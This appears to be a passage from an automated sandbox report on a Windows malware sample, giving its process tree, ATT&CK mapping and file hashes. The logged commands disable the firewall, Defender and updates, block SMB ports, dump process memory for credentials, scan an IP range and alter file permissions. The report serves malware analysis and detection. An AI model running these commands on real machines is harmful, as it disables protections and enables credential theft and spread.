    - Scheduled Task/Job: Scheduled Task
    PID:4148
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3276
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2856
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4980
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2904
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4356
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4344
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3132
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2664
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2240
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3508
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3468
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1316
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4500
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:4320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:3616
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3856
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:3180
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1452
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:5068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1064
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:2852
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:4268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1164
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:940
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:2596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:920
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  PID:5116
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:3312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2412
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1420
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:856
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:540
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 768 C:\Windows\TEMP\lntufbicv\768.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5032
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3680
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 336 C:\Windows\TEMP\lntufbicv\336.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2736
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 1600 C:\Windows\TEMP\lntufbicv\1600.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3320
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 2500 C:\Windows\TEMP\lntufbicv\2500.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2232
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 2784 C:\Windows\TEMP\lntufbicv\2784.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:860
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 2844 C:\Windows\TEMP\lntufbicv\2844.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:208
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 3156 C:\Windows\TEMP\lntufbicv\3156.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4216
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 3892 C:\Windows\TEMP\lntufbicv\3892.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 3980 C:\Windows\TEMP\lntufbicv\3980.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:784
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 4044 C:\Windows\TEMP\lntufbicv\4044.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4444
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 1056 C:\Windows\TEMP\lntufbicv\1056.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 2128 C:\Windows\TEMP\lntufbicv\2128.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2052
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 720 C:\Windows\TEMP\lntufbicv\720.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2536
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 316 C:\Windows\TEMP\lntufbicv\316.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4652
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 2168 C:\Windows\TEMP\lntufbicv\2168.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3700
- C:\Windows\TEMP\lntufbicv\cuinytuyr.exe
  C:\Windows\TEMP\lntufbicv\cuinytuyr.exe -accepteula -mp 3264 C:\Windows\TEMP\lntufbicv\3264.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3556
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\lntufbicv\nibkahlsb\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3356
- - C:\Windows\lntufbicv\nibkahlsb\abkbubrfy.exe
    abkbubrfy.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:732
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  PID:3376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:920
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1868
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:4412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5876
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5972

C:\Windows\SysWOW64\umueiy.exe
C:\Windows\SysWOW64\umueiy.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1360

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kunylkua\bmgkttu.exe /p everyone:F
1⤵
PID:3204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1720
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\kunylkua\bmgkttu.exe /p everyone:F
  2⤵
  PID:4056

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bmgkttu.exe
1⤵
PID:2760
- C:\Windows\ime\bmgkttu.exe
  C:\Windows\ime\bmgkttu.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:924

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ipcijinrc\uyibml.exe /p everyone:F
1⤵
PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3332
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\ipcijinrc\uyibml.exe /p everyone:F
  2⤵
  PID:1144

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bmgkttu.exe
1⤵
PID:5456
- C:\Windows\ime\bmgkttu.exe
  C:\Windows\ime\bmgkttu.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2852

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kunylkua\bmgkttu.exe /p everyone:F
1⤵
PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5352
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\kunylkua\bmgkttu.exe /p everyone:F
  2⤵
  PID:2656

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ipcijinrc\uyibml.exe /p everyone:F
1⤵
PID:1268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1796
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\ipcijinrc\uyibml.exe /p everyone:F
  2⤵
  PID:2032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\TEMP\ipcijinrc\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\lntufbicv\1056.dmp

Filesize
43.9MB

MD5
3defe94d2b6fe561d07cab7ef863a34e

SHA1
c7268c8f88ecb4eb6aa934cb84efa360ba3d0555

SHA256
e7988b5ab7c235e7caf0c394b80c855113fa6400c6a929bf0a792ab9e48dfe9f

SHA512
cbef1a6b7e71e70e8c499fc232e92e107985c2b82fb80ab97a3cbb84d9c3d3f2f95d4db94059d3854465e4cc4397f25b98aecd7347151c5ceaae48bea3fb184d

Download Submit
C:\Windows\TEMP\lntufbicv\1600.dmp

Filesize
4.1MB

MD5
6a68d2573ec0528bf378bfb29cc233aa

SHA1
e69113174d6e7bcdbc1df4757d67fea937115e7d

SHA256
44b663e059c7f983299ee6ce2a9a6b63f414626da6a16aad78ab2d25f576a708

SHA512
bbfd672d4f459b89ba1b9cfa2114365e134146f05aa7c7bda7c85083140f66e99d5047c9b5d5a6b0cb782be6f22db07e2f734f741510481ed850e75bdbba5472

Download Submit
C:\Windows\TEMP\lntufbicv\2128.dmp

Filesize
26.0MB

MD5
03d0962a9adbbb311caa692e4a80e8a0

SHA1
f4e1d377193e4a93c622e264a70cd8253985b600

SHA256
a5b202b5903db3a18bcfbefdffa499fcdd3a0b7624470cad0320bd770dc56599

SHA512
453de8f02ba0e163f4b6fb7f5b8af013cb50935ddf0f6539e8f1667a1bedd137fd7a455c30dcb1c5534dc73cbb113d05dca670b9e0371c8de49e0f7c1042e12a

Download Submit
C:\Windows\TEMP\lntufbicv\2168.dmp

Filesize
1.3MB

MD5
dfa1eebe9621f1c8eb27a14742450426

SHA1
537c0ea60c7e1a1925aac20a5f46867c1057bd42

SHA256
1814408aa67b8f27a06d2768dfe36b1d669294419a2852641c264e62c6a5f4f6

SHA512
8557698de7973d798bdab0fe9093f7a86341623b931ecb10ef57b33e9ff19052190f0184c1e4d3663eabc206ed25f3bf877edad003a4212d6251cc2e34bdfa11

Download Submit
C:\Windows\TEMP\lntufbicv\2500.dmp

Filesize
3.6MB

MD5
a4df32a314eda8105c629cdf05b208d3

SHA1
13a6d6697959f282b7ebdc01b5633e6a2cac7ecf

SHA256
a76c1270278a86b84cac39f315e638d259bf40be68a45ac8f575fa930c252535

SHA512
07c8153c94b631a8b08b89bdba4ae98b1458deb96e5d927b3e7ce69e3cee8b1383b07e4f080fad764de04f3642807d97cf93b58f6189b56c30d6b3f0903961e5

Download Submit
C:\Windows\TEMP\lntufbicv\2844.dmp

Filesize
7.6MB

MD5
4e57e484bc59bbf2837e203a8a822aae

SHA1
a98762e0d8c6673ae41f91b073f318231498b811

SHA256
99eded08ad4248b0cd86f0dd300c7b1bb828e5f08120464637230738f6a2de81

SHA512
49472b14b3949b54deec00e8fe34098f5fa0950fe9370038ab48a53ac91f5b066f95d2017fc5ccb7e8c71bc9946160a68e394086c45da416c141c8980b1f382a

Download Submit
C:\Windows\TEMP\lntufbicv\3156.dmp

Filesize
814KB

MD5
7537b833644d81731053d1506b7fedb9

SHA1
18f66f5bc9f54bbabce910838ef9e858f9db65fd

SHA256
fa8dafa2f7ba3ee3abe7c0437070a69214488b5ea5b09e37b1018e63b28d3a5e

SHA512
1f91ef58035d4bb4f92790818c24041513b16e4951933c53942ec544c1a72e3eb2c87ac4c049ca5ef6791fd0a13a8219a398b0b71bdd5c928116d7891d89834a

Download Submit
C:\Windows\TEMP\lntufbicv\316.dmp

Filesize
8.7MB

MD5
6a6381043e4bc66ffb1f186dff22b48e

SHA1
ff52026d159efcb809b4288af3f20621febcc82d

SHA256
f1f84599b0849ccca3078c384fbba5823a319ed09da121cc6e2e41fa62a3650c

SHA512
7f3f831ec554895454ff9a45b0a37d94c29e6a3f744723d2deca9991b4bd85bf0db10683ce2d978acfc7251323a37abc2ae12e6d5e3110c3a703a97223b5f11c

Download Submit
C:\Windows\TEMP\lntufbicv\3264.dmp

Filesize
1.5MB

MD5
c869b079b34899faac36135f5d13bb81

SHA1
8b9d32e1cfa7f2ec0eeb01afa2c652c8d02d0600

SHA256
b221df6f66774d1563d2e12a9cd45d23c043499efb45ef2a347afcfcfb541144

SHA512
170aa4a3891e8ca7658bffe1bec9d5764849d4976f78a3039443318c15177daea4a21616ff973d7ea70fc82f40ae9a5ed4a33b11cd8aa2a2e9f734e169c7f3ee

Download Submit
C:\Windows\TEMP\lntufbicv\336.dmp

Filesize
33.4MB

MD5
0e61542935e572612b8a5bb1ceb5d6d3

SHA1
83abeb4859608b81ad78f9e48bc2941d54536721

SHA256
f9a07e1cfdf98a6050178c40fdeb869d9fcd746f4a2ca57550a4894d370dfc88

SHA512
0ba7459ec3c78c3c56328a217925840051cbd76b922e03d2dfe2ef01bd1e46612dbcc0569a400170d51a9b1e180a3d963632bb7f99f178a8f2cbf66c92a41379

Download Submit
C:\Windows\TEMP\lntufbicv\3892.dmp

Filesize
2.7MB

MD5
b1ec9e23b75095f5f3e717567f23565e

SHA1
841c066216361fc2f3faa36a48fd58d756fdf437

SHA256
907c73496cee346b37b99122095a8c1720946cca3d1767d426a14e7cbabcd5b0

SHA512
2ad756730e62fc3bcfdbacba6de5b403158b70c746aec792df77445316099ca07a36c33f6903e3515efe7de5d391131b0c6ac7b85e24012c202a359770a61b99

Download Submit
C:\Windows\TEMP\lntufbicv\3980.dmp

Filesize
20.7MB

MD5
9b931e7a8b54f89702758ab924594996

SHA1
0d1bddf8d582a2f23675622466e70b89571c5261

SHA256
61b80bc5c4269f941fd10fef743d3a82cf15c18fa5fbd25be7730f5bd22dbaec

SHA512
dabef659f54b8b62661a32ed052c2b9a046f7e9447f9bba60a9bb7f5230c908d2b19935c81d3aed7ef676fe956f15f2c61ede19e40db321089905abe5a9778de

Download Submit
C:\Windows\TEMP\lntufbicv\4044.dmp

Filesize
4.1MB

MD5
0026ab6e9e6c6dd9be1491e17d2134e3

SHA1
2026e2652eac697ff377f3a28f0b480585979b07

SHA256
6a12ab6bacc5d89c644986e7f4bde53a61866f85c7756866549d0c9f17cdece6

SHA512
512b4334a2da40f6d9d5d369f5e8f7a81cdd48476738bd7eacdf275d92c691b195721b98a0f5ac3d9ecc38ef8cbad98cf327cbc22a8d09ee5d3494c0f8c3d9cb

Download Submit
C:\Windows\TEMP\lntufbicv\720.dmp

Filesize
1.2MB

MD5
983083655046f820079161b2247e9527

SHA1
09efcf48f47457d162836f9349fe12eb183018d4

SHA256
874e67865debffd7e3410308cf4cf11adf3ad63d665af5a594b12fd91ecef192

SHA512
bfe2e567f43d190c6d1056248ea56f94af90624258d6a59909e0ea6df586f0d564b0347fae0414893f0cf63b96c89b1a5bc5fa46ea23f1b44a87a7a3817a23c0

Download Submit
C:\Windows\TEMP\lntufbicv\768.dmp

Filesize
1019KB

MD5
f50604f2b0f622cc75a62433e6b3a301

SHA1
349e6f7a4fadaeda2f5c10344ae0d5dac30e097e

SHA256
f742a15b65d79c0b6ec247a853374f3852487b184ee15294a52778d77c03d7a6

SHA512
8f908f3028075f30e73ee7434ef7fc2301ee146fda49fcda5e2a03f95fad06a58be26ed23a1c25c488ae33133ff7eb7c36ce50f638b7864da9420931fb22963c

Download Submit
C:\Windows\Temp\ipcijinrc\uyibml.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\lntufbicv\cuinytuyr.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\kunylkua\bmgkttu.exe

Filesize
8.2MB

MD5
8c4a2c9d1c1dd03585bac6f3d1923583

SHA1
73b7232a69b952625895dd0952d409cfb5e089bd

SHA256
9085f909fd1c846b46ecfcac793ce87c0cc906762aa473d8d12dbb156edc8f07

SHA512
6de4438bc6ed9822e263d7f1137ffbb9c4ee74008169fc6a1f1b0ad046fe0b9b792fbe6c2688e22cd18be011483a1fbedb1fcb326f29b07f2362e7843d0a5b6d

Download Submit
C:\Windows\lntufbicv\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\lntufbicv\nibkahlsb\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\lntufbicv\nibkahlsb\abkbubrfy.exe

Filesize
63KB

MD5
821ea58e3e9b6539ff0affd40e59f962

SHA1
635a301d847f3a2e85f21f7ee12add7692873569

SHA256
a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

SHA512
0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

Download Submit
C:\Windows\lntufbicv\nibkahlsb\ip.txt

Filesize
162B

MD5
59c0183a282cd30af7f686eb67a932be

SHA1
e1bad4a2b9d6a2ada1f7fa08300d9565d55edeb8

SHA256
52669842119c9530aa8ab530d2c9e72f725c4dddbaefdeabe196b8bfcd498482

SHA512
8c3a5537d9f298605043059738f98371528767a1c27c7dbcfd94994598cf7df41a9580128772ca3b4dc9defda2e63b40261ff1728264226b5b02421698196231

Download Submit
C:\Windows\lntufbicv\nibkahlsb\scan.bat

Filesize
160B

MD5
a4db3ced9012bb1d1aa3f524bdc8ead1

SHA1
f15741b6408de39412334731a131ecd547ead404

SHA256
6813f5310ddd3e66966e51bbc0a2c64797ca438a3646564988cd1dc044613a47

SHA512
90999fb0ef03d3ada5a4ec1bf337a84d49a7d79d1af082310a39c9eaa6121b6be80c5e4739ae38bcaa4f0644cb9580c648310522016913dc3dc41ffe04089991

Download Submit
C:\Windows\lntufbicv\nibkahlsb\tqbingtiu.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\lntufbicv\nibkahlsb\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\lntufbicv\nibkahlsb\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

